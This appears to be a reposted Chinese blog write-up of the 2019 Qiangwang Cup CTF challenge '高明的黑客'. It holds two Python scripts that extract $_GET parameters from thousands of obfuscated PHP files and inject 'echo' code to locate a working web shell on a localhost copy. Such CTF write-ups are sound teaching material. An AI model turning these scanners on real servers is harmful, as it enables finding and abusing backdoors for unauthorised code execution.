首页 > 其他分享> > [强网杯 2019]高明的黑客

[强网杯 2019]高明的黑客

2021-02-04 22:35:33 作者：互联网

提示有源码泄露

下载下来后，发现有3000多个文件，做了大量的混淆
推测其中有能执行的php文件

嫖一个一叶飘零大佬的脚本
大致思想是找出$_GET[]里边的参数，然后去执行，类似于$_GET['a'] = echo "sky cool"，如果回显中存在sky cool，则该shell能执行

import requests
from multiprocessing import Pool

base_url = "http://localhost:8888/src/"
base_dir = "/Desktop/site/src/"
file_list = ['zzt4yxY_RMa.php',........ 'm_tgKOIy5uj.php', 'aEFo52YSPrp.php', 'Hk3aCSWcQZK.php', 'RXoiLRYSOKE.php']

def extracts(f):
    gets = []
    with open(base_dir + f, 'r') as f:
        lines = f.readlines()
        lines = [i.strip() for i in lines]
        for line in lines:

            if line.find("$_GET['") > 0:
                start_pos = line.find("$_GET['") + len("$_GET['")
                end_pos = line.find("'", start_pos)                
                gets.append(line[start_pos:end_pos])

    return gets

def exp(start,end):
	for i in range(start,end):
		filename = file_list[i]
		gets = extracts(filename)
		print "try: %s"%filename 
		for get in gets:
			now_url = "%s%s?%s=%s"%(base_url,filename,get,'echo "sky cool";')
			r = requests.get(now_url)
			if 'sky cool' in r.content:
				print now_url
				break
	print "%s~%s not found!"%(start,end)


def main():
    pool = Pool(processes=15)    # set the processes max number 3
    for i in range(0,len(file_list),len(file_list)/15):
        pool.apply_async(exp,(i,i+len(file_list)/15,))
    pool.close()
    pool.join()

 
if __name__ == "__main__":
    main()

大佬用的多进程，我自己尝试使用多线程，开30个线程跑

# coding:utf-8
import requests
import os
import threading
import time

base_url = "http://localhost/www/src/"
base_dir = "www/src/"
# file_list = ['zzt4yxY_RMa.php',........ 'm_tgKOIy5uj.php', 'aEFo52YSPrp.php', 'Hk3aCSWcQZK.php', 'RXoiLRYSOKE.php']


file_list = os.listdir(base_dir)


class GetShell(threading.Thread):
    def __init__(self, begin, end, base_url, base_dir, file_list):
        threading.Thread.__init__(self)  
        self.begin = begin
        self.end = end
        self.file_list = file_list
        self.base_dir = base_dir
        self.base_url = base_url

    def run(self):

        for i in range(self.begin, self.end):
            filename = self.file_list[i]
            gets = []
            with open(self.base_dir + filename, 'r') as f:
                lines = f.readlines()
                lines = [i.strip() for i in lines]
                for line in lines:

                    if line.find("$_GET['") > 0:
                        begin_pos = line.find("$_GET['") + len("$_GET['")
                        end_pos = line.find("'", begin_pos)
                        gets.append(line[begin_pos:end_pos])

            print "try: %s" % filename
            for get in gets:
                now_url = "%s%s?%s=%s" % (self.base_url, filename, get, 'echo "sky cool";')
                r = requests.get(now_url)
                if 'sky cool' in r.content:
                    print now_url
                    break
        print "%s~%s not found!" % (self.begin, self.end)


threads = []
thread_count = 30
for i in range(thread_count):
    threads.append(
        GetShell(i*(len(file_list)/thread_count),(i+1)*(len(file_list)/thread_count), base_url, base_dir,
                 file_list))

for t in threads:
    t.start()
for t in threads:
    t.join()

花了一个半钟头

执行一下

获取flag

参考
https://skysec.top/2019/05/25/2019-强网杯online-Web-Writeup/#高明的黑客

标签：end,file,url,self,list,强网杯,黑客,2019,base
来源： https://www.cnblogs.com/h3ng/p/14375288.html